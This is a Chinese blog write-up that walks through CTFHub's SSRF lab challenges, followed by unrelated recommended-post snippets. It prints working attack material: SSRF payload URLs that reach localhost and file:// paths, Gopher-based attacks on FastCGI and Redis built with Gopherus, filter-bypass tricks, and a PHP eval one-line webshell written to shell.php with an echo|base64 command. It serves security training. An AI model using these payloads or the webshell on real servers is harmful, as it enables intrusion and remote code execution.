CTFHub技能树 Web-SSRF篇

已于 2024-08-28 14:45:58 修改
阅读量130 收藏 4
点赞数 6
文章标签: 前端
于 2024-08-27 16:44:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80176211/article/details/141603266
版权

进入技能书,找到WEB-SSRF

1.内网访问

我们是从目标主机内网环境访问它本地的flag.php,我们构建url

/?url=http://127.0.0.1/flag.php

2.伪协议读取文件

题目已经说了是伪协议读取文件,那我们就试试

/?url=file:///var/www/html/flag.php

查看页面源代码

3.端口扫描

既然已经提示了端口,那我们用bp来爆破一下

先设置url,将端口设为变量

发往攻击器进行攻击

4.POST请求

我们去访问127.0.0.1/flag.php,得到了一个输入框,查看源代码

把key的值填入输入框

回显我们只有127.0.0.1才能访问,那我们就抓个包修改请求头

将内容编码

将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0

再次进行URL编码并使用Gopher进行攻击访问,获取Flag

5.上传文件

我们先查看flag.php

我们新建一个flag.php,内容随意,这里我们写一句话木马

这里我们发现没有提交按钮,那我们就写一个提交按钮

<input type="submit" name="submit">

我们重新提交抓包看看

与上关的步骤一样

6.FastCGI协议

准备一句话木马并构造要执行的终端命令:对一句话木马进行base64编码且写入到名为
shell.php的文件中。

# 一句话木马
<?php @eval($_POST[cmd]);?>
# base64编码后

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+"|base64 -d > shell.php

这时我们的桌面上就出现了shell.php

使用Gopherus工具生成payload

# 项目地址

https://github.com/tarunkant/Gopherus.git

# 执行命令
 

python2 gopherus.py --exploit fastcgi

将生成的payload再进行第二次编码即可.访问上传..

访问shell.php

没有报错,说明存在,因为php为后端代码,所以前端看不到,我们用中国蚁键去连接

在var下有一个flag文件,打开即可看到flag

7.Redis协议

这关与上关基本一样,只是命令变成了redis

python2 gopherus.py --exploit redis

把给我们的东西进行二次编码

然后去访问

这里我们看到他一直在缓存,我们不等他,直接访问shell.php

这里我们就可以用蚁键去连接了

8.URL Bypass

这里我们看到他要求在url中必须包含http://notfound.ctfhub.com,那么我们可以加一个@,让这个网址变成用户,去访问我们的127.0.0.1/flag.php

9.数字IP Bypass

我们可以看到他的意思是不让我们用127及172,那我们就不写IP地址,直接写本机localhost

9.302跳转 Bypass

这关我们可以看到他是拦了我们的IP地址,那我们依然采用localhost来绕过

10.DNS重绑定 Bypass

我们点开题目附件,详细了解一下DNS重绑定,然后我们利用网站进行重绑定

https://lock.cmpxchg8b.com/rebinder.html
最后将得到的内容输入到url即可

偷&心
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHub技能树 Web-SSRF(保姆级通过全攻略)
2301_76631050的博客
07-24 620
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Serve在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。步骤三:将HTTP头部的Host字段修改为127.0.0.1:80然后就是老操作... url编码一次在把%0A换成 %0D%0A 并且末尾要加上%0D%0A,然后再对url进行第二次编码....如下。步骤三:将其中的%0A 替换成%0D%0A 并且末尾要加上%0D%0A。
CTFHub技能树 Web-SSRF(保姆级通过教程)
weixin_45808483的博客
11-10 5705
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1061
CTFHub技能树-web-ssrf
CTFHub技能树 Web-SSRF 302跳转 Bypass
Senimo
07-05 3562
CTFHub技能树 Web-SSRF 302跳转 Bypass hint:SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧 启动环境,依然为空白界面,查看URL: http://challenge-722b117ccdc24f8e.sandbox.ctfhub.com:10800/?url=_ 其中有通过GET传参的url,尝试访问127.0.0.1/flag.php页面: 提示:不允许企业内部IP访问,使用file协议
Window Performance API
Bruce__taotao的博客
08-28 1575
Window Performance API 是一组浏览器提供的接口,用于收集和分析网页性能数据。它允许开发者精确地测量网页加载时间、资源加载时间、用户交互延迟等性能指标,从而优化用户体验。1. 主要接口1.1返回一个高精度时间戳,通常用于计算精确的时间差。例如,你可以用它来测量函数执行时间。使用场景: 精确计算代码段的执行时间。// 执行某个任务console.log(`执行时间:${// 执行某个任务 const end = performance . now();
vue ref和reactive区别
灰海
08-25 6360
在第二个示例中,我们使用了reactive来创建一个名为state的响应式对象,它包含name和age两个属性。在模板中,我们通过{{ state.name }}和{{ state.age }}来显示state对象的属性值。在第一个示例中,我们使用了ref来创建一个名为count的响应式引用,它是一个简单的数字类型。在模板中,我们通过{{ count }}直接显示count的值,而不需要.value前缀,因为Vue的模板语法会自动处理ref的.value访问。
安防视频汇聚平台EasyCVR启动后无法访问登录页面是什么原因?
EasyCVR视频融合云平台的技术博客
08-27 658
以进程方式启动(./easycvr)时,清楚看到此时web端口【9004】被占用。更改端口后,EasyCVR视频汇聚平台可以正常访问了。
vue 通过事件的形式调用全局组件
liux6687的博客
08-29 1570
通过vue.use 挂载组件,然后在vue 原型上添加属性, 再通过调用属性方法传参的形式控制组件。这里我是写了一个文件上传组件。
后端输出二进制数据,前端fetch接受二进制数据,并转化为字符输出
cdcdhj的博客
09-01 249
在这个前端代码中,我们使用fetch API请求PHP脚本,并获取二进制数据。然后,我们将ArrayBuffer转换为字符串,以便在JavaScript中使用。在PHP中,你可以将字符串或其他数据类型转换为二进制数据,并通过HTTP响应发送给前端
从面向对象(OOP)到面向切面(AOP):编程范式的演变
妍思码匠的博客
08-30 1018
本文深入探讨了面向切面编程(AOP)在前端开发中的应用,解释了AOP如何通过动态增强与代码复用、降低模块间耦合度,为前端项目带来更高效、更模块化的解决方案。通过具体案例分析,如日志记录切面和动态埋点的实现,展示了如何利用装饰器模式、高阶组件等技术在前端实现AOP。理解AOP的原理与实践,将有助于开发者构建更易于维护和扩展的前端应用。无论你是前端新手还是资深开发者,本文都将为你提供有价值的见解和实用技巧。
vue3使用-watch监听总结
最新发布
weixin_44072254的博客
09-01 266
{deep: true, immediate: true, flush: 'post'}:deep是深度监听;flush:如果想在侦听器回调中能访问被 Vue 更新之后的所属组件的 DOM就用'post',sync'创建一个同步触发的侦听器,它会在 Vue 进行任何更新之前触发;flush: 'post', 如果想在侦听器回调中能访问被 Vue 更新之后的所属组件的 DOM就用'post'flush: sync',创建一个同步触发的侦听器,它会在 Vue 进行任何更新之前触发。监听数组的方式-示例。
JavaWeb——前端工程化
m0_50460160的博客
08-30 751
通过解构赋值,可以访问到对象中的属性,并将其赋值给对应的变量,从而提高代码的可读性和可维护性;ES6 的解构赋值是一种方便的语法,可以快速将数组或对象中的值拆分并赋值给变量。该语句将数组 [1,2,3]中的第一个值赋值给a变量,第二个值赋值给b变量,第三个值赋值给c变量。ES6引入的模块化功能为JavaScript代码的组织和管理提供了更好的方式,不仅提高了程序的可维护性,还让JavaScript更方便地应用于大型的应用程序;并不是变量的值不得改动,而是变量指向的那个内存地址所保存的数据不得改动;
KEYSIGHT是德 Infiniium EXR系列 示波器
XLTYQYB的博客
08-29 1331
该系列的所有型号都集成了一个 10 位 ADC,并且在所有通道上同时提供 16 GSa/s 的采样率。高分辨率 ADC 的效用取决于示波器的前端底噪是否足够低以提供与之匹配的额外的量化电平空间。我们的低噪声前 端包含定制 IC,例如 130 纳米 BiCMOS IC(其中集成了用户可选的模拟滤波器),并且带宽可通过软件 许可证升级。使用硬件滤波时,噪声低至 43 μV,系统 ENOB 达到 9.0 位。Infiniium EXR系列 示波器 型号比较。垂直分辨率是 8 位示波器的 4 倍。
前端学习Day36
2401_83657100的博客
08-31 267
同样的将变量和函数组合到了一起并能通过this 实现数据的共享,所不同的是借助构造函数创建出来的实例对象之间是彼此不影响的。就是分析出解决问题所需要的步骤,然后用函数把这些步骤一步一步实现,使用的时候再一个一个的依次调用就可以了。我们可以把那些不变的方法,直接定义在 prototype对象上,这样所有对象的实例就可以共享这些方法。构造函数和原型对象中的this 指向构造函数和原型对象中的this都指向实例化的对象。构造函数和原型对象中的this 都指向实例化的对象。构造函数体现了面向对象的封装特性;
【jQuery】前端八股文面试题
Una的博客
08-30 1325
会持续更新,但jQuery被问到的比较少,主要是是机试的时候,看会不会用。
小程序页面跳转传url参数被截取问题
Xiang_Gong_Ya_的博客
08-30 291
{${${
Java Web实战教程:如何一步步开发美容美发管理系统
WEIXIN_JSJBCZDS的博客
08-28 704
Java Web实战教程:如何一步步开发美容美发管理系统 本文详细介绍了如何利用Java Web技术一步步开发美容美发管理系统,重点解析了系统核心业务功能,包括客户预约、服务管理、员工调度等。文章通过实际案例和代码演示,帮助读者掌握Java Spring Boot和Vue.js等现代Web开发技术,为计算机专业学生和开发者提供了一个实践性强、易于上手的开发教程。
滴滴前端日常实习一面
weixin_46714216的博客
08-31 401
滴滴前端面经
ctfhub web技能树302跳转
07-28
CTFHubWeb技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHubWeb技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能树 web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树 Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值